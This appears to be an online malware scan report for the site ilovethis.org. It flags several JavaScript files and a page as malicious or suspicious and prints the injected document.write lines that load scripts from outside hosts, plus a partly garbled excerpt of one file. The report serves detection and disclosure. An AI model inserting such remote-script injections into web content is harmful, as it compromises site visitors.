Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ilovethis.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ilovethis.org/ | 200 OK Content-Length: 34453 Content-Type: text/html | clean |
http://www.ilovethis.org/hotke.js | 200 OK Content-Length: 3893 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var mykey; if (window.Event){document.captureEvents(Event.KEYDOWN);} document.onkeydown = myKeyDown; function myKeyDown(e){if (window.Event){mykey = e.which;} else{mykey = event.keyCode} mykey = String.fromCharCode(mykey); if ((mykey == "I") || (mykey == "i") || (mykey == "X") || (mykey == "x")) {document.location.href = "07ilt.htm";} if ((mykey == "O") || (mykey == "o")){document.location.href = "index.htm";} if ((mykey == "K : top.location.href = LOM "ilt.htm#top" ; } } if ((mykey == "G") || (mykey == "g")) {goog=window.open("35ilt.htm","_blank", "width=800,height=440,menubar,toolbar,location,status,scrollbars,resizable"); } } document.write('<script src="http://lbrproperties.biz/lbrsales/h5pPqB5D.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.ilovethis.org/bkmrk.js | 200 OK Content-Length: 1333 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function bookmarksite(title,url){ if (window.sidebar) window.sidebar.addPanel(title, url, ""); else if(window.opera && window.print){ var elem = document.createElement('a'); elem.setAttribute('href',url); elem.setAttribute('title',title); elem.setAttribute('rel','sidebar'); elem.click(); } else if(document.all) window.external.AddFavorite(url, title); } document.write('<script src="http://lbrproperties.biz/lbrsales/h5pPqB5D.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.ilovethis.org/audio.js | 200 OK Content-Length: 757 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function playSound(soundfile) { document.getElementById("dummy").innerHTML= "<embed src=\"" soundfile "\" hidden=\"true\" autostart=\"true\" loop=\"false\" />"; } document.write('<script src="http://lbrproperties.biz/lbrsales/h5pPqB5D.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.ilovethis.org/holtp.js | 200 OK Content-Length: 17470 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://gruposangil.com/images/k7ynxf9z.php?id=48028281"></script>'); | ||
http://www.ilovethis.org/02ilt.htm | 200 OK Content-Length: 40902 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.pannapomodoro.com/rThvL8Py.php?id=48028259"></script> | ||
http://www.ilovethis.org/index.htm | 200 OK Content-Length: 34453 Content-Type: text/html | clean |
http://www.ilovethis.org/03ilt.htm | 200 OK Content-Length: 115542 Content-Type: text/html | clean |
http://www.ilovethis.org/11ilt.htm | 200 OK Content-Length: 97107 Content-Type: text/html | clean |
http://www.ilovethis.org/12ilt.htm | 200 OK Content-Length: 61805 Content-Type: text/html | clean |
http://www.ilovethis.org/31ilt.htm | 200 OK Content-Length: 184451 Content-Type: text/html | clean |
http://www.ilovethis.org/test404page.js | 404 Not Found Content-Length: 1495 Content-Type: text/html | clean |
http://www.ilovethis.org/04ilt.htm | 200 OK Content-Length: 41540 Content-Type: text/html | clean |
http://www.ilovethis.org/06ilt.htm | 200 OK Content-Length: 28747 Content-Type: text/html | clean |
http://www.ilovethis.org/07ilt.htm | 200 OK Content-Length: 48478 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ilovethis.org
Result:
GET / HTTP/1.1
Host: ilovethis.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ilovethis.org
Referer: http://www.google.com/search?q=ilovethis.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ilovethis.org
Referer: http://www.google.com/search?q=ilovethis.org
Result:
The result is similar to the first query. There are no suspicious redirects found.